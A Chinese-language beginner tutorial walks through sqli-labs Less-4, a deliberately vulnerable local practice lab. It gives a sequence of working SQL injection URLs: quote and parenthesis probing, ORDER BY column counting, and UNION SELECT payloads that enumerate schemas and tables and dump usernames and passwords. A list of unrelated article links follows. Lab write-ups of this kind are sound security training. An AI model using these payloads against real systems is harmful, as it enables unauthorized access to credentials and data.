sqli-labs-less-4圖文詳解,適合小白
Less-4
less1-3以釋出,1-4題相關知識點在https://blog.csdn.net/qq_46432288/article/details/109226871中,點選檢視吧!!!
less-4與1-3方法基本一致,只是最開始的判斷注入點有一點差別。
判斷注入:
http://127.0.0.1/sqli-labs-master/Less-4/?id=1 顯示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 顯示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1’’ 顯示正常(兩個單引號)
http://127.0.0.1/sqli-labs-master/Less-4/?id=2" 顯示錯誤(一個雙引號),錯誤:’“2"”) LIMIT 0,1’,出現一個)
http://127.0.0.1/sqli-labs-master/Less-4/?id=2")–+ 顯示正常,判斷原資料輸入後應該為(“id”)
判斷欄位列數:
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 10 --+
顯示Unknown column ‘10’ in ‘order clause’,說明欄位列數少於10,繼續縮小數值進行測試。
http://127.0.0.1/sqli-labs-master/Less-4/?id=2") order by 3 --+ 正常顯示,表明欄位列數為3
判斷可回顯位:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,3 --+
判斷當前資料庫:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,database() --+
判斷當前使用者:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,user() --+
檢視所有資料庫:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
檢視當前資料庫中的所有表:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
檢視users表中的欄位:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
輸出username:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(username) from security.users --+
輸出password:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(password) from security.users --+
將username和password連線並聯合輸出:
http://127.0.0.1/sqli-labs-master/Less-4/?id=-2") union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users --+
Less-4結束
。。。未完待續
相關文章
- python適合小白學嗎?Python
- PyCharm的使用教程【圖文結合-詳細】PyCharm
- Java泛型詳解,史上最全圖文詳解!Java泛型
- PopClip使用教程圖文詳解
- Git使用教程圖文詳解Git
- 分頁機制圖文詳解
- Typora+圖床詳解(小白都能學得會)圖床
- DEVONthink詳解|哪些檔案最適合放進 DEVONthink?dev
- 520 頁機器學習筆記!圖文並茂可能更適合你機器學習筆記
- 圖文詳解23種設計模式設計模式
- 圖文並茂詳解 NAT 協議!協議
- 微信公共號申請圖文詳解
- Android圖文詳解屬性動畫Android動畫
- CentOS 7安裝教程(圖文詳解)CentOS
- [適合小白的Linu基礎入門教程一
- EventBus 3.0+ 原始碼詳解(史上最詳細圖文講解)原始碼
- 事務隔離級別(圖文詳解)
- LL圖文詳解mysql中with...as用法huxMySqlUX
- 微服務最全詳解(圖文全面總結)微服務
- cookie與session的區別(圖文詳解)CookieSession
- Android圖文混排實現方式詳解Android
- Android RxJava :圖文詳解 背壓策略AndroidRxJava
- 圖文詳解C#單元測試C#
- JasperReport初級教程(2.0.3)圖文詳解
- Jenkins安裝部署使用圖文詳解(非常詳細)Jenkins
- 【分享】5個非常適合Python小白的開發工具!Python
- 適合新手小白的UI學習路線完整版UI
- 非常適合小白入門的Python學習路線Python
- socket基礎詳解 小白白
- Java單連結串列反轉圖文詳解Java
- 圖文詳解Java物件記憶體佈局Java物件記憶體
- 負載均衡最全詳解(圖文全面總結)負載
- EF三種程式設計方式圖文詳解程式設計
- mysql資料庫的安裝(圖文詳解)MySql資料庫
- Android 中 Canvas 繪圖之 Shader 使用圖文詳解AndroidCanvas繪圖
- Android中Canvas繪圖之Shader使用圖文詳解AndroidCanvas繪圖
- 非常適合小白入門的Go語言學習路線Go
- Python適合初學者或者0基礎小白學習嗎?Python